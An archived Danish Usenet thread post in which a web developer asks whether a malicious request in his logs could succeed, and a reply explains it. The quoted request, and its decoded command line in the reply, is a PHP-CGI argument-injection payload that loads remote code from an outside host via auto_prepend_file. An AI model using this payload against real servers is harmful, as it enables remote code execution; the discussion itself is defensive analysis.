Groups | Search | Server Info | Login | Register

Groups > dk.edb.internet.webdesign.serverside.php > #7251

Re: Ondsindet request

From Arne Vajhøj <arne@vajhoej.dk>
Newsgroups dk.edb.internet.webdesign.serverside.php
Subject Re: Ondsindet request
Date 2020-04-14 16:19 -0400
Organization Aioe.org NNTP Server
Message-ID <r755st$ajl$1@gioia.aioe.org> (permalink)
References <1tdp12me6kivq.dlg@lundhansen.dk>

Show all headers | View raw

On 4/14/2020 4:00 PM, Bertel Lund Hansen wrote:
> Jeg er ved at lege med lidt statistik på Fidusos sider, og i den
> forbindelse aflæste jeg bl.a. $_SERVER['REQUEST_URI']. Jeg skrev
> de fundne data til en tekstfil som jeg så vil bearbejde med et
> statistikprogram.
> 
> I datafilen forekom så følgende request:
> /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru//components/com_foxcontact/default.txt
> Hvis du ikke gider læse den hele, kan jeg afsløre at dette domæne
> optræderderi: tenderplus.spb.ru
> 
> Nu er Fidusos indgangsside lavet således:
> 
>    	$code='index';
>    	$order=$_GET['page'];
>    	if (isset($sider[$order]))
>    		$code=$order;
> 
> Jeg er nogenlunde sikker på at det garanterer at den slags angreb
> ikke kan få succes, men jeg vil gerne lige jhave det bekræftet.
> Er det ikke korrekt?
> 
> $sider er en variabel der hentes fra en inc-fil hvis start ses
> her :
> 
>    	$sider = Array (
>    	'index' => 'Forside',
>    	'skraekeksempler' => 'Skrækeksempler',
>    	'splittet' => 'Splittede ord',
> osv.
> 
> Er det ikke korrekt at det er GET-konstruktionen der har fået dem
> til at forsøge et angreb?

Det der er vist ikke tiltænkt $_GET men snarere tiltænkt en
primitiv CGI wrapper omkring PHP.

Hvis serveren forsøger at køre PHP som:

php <URL as is>

og hvis der var et mellemrum ekstra så ville det der blive til:

php /index.php? -dsafe_mode=Off -ddisable_functions=NULL 
-dallow_url_fopen=On -dallow_url_include=On 
-dauto_prepend_file=http://tenderplus.spb.ru//components/com_foxcontact/default.txt

hvilket ville få PHP til at gøre visse ting som du ikke ville
være glad for.

Jeg har svært ved at forestille mig så hullet et PHP setup, men
nogle skumle typer må jo tro at det findes nogen steder.

Arne

Back to dk.edb.internet.webdesign.serverside.php | Previous | NextPrevious in thread | Next in thread | Find similar

Thread

Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-14 22:00 +0200
  Re: Ondsindet request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-14 16:19 -0400
    Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 09:13 +0200
      Re: Ondsindet request Martin Larsen <martin+spamfree+larsen@bigfoot.com> - 2020-04-15 10:16 +0200
      Re: Ondsindet request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-15 08:30 -0400
        Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:41 +0200
          Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:43 +0200
  Re: Ondsindet request Jan Hansen <jhjjhjhhansen@gmail.com> - 2020-04-15 14:19 +0200
    Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:38 +0200

csiph-web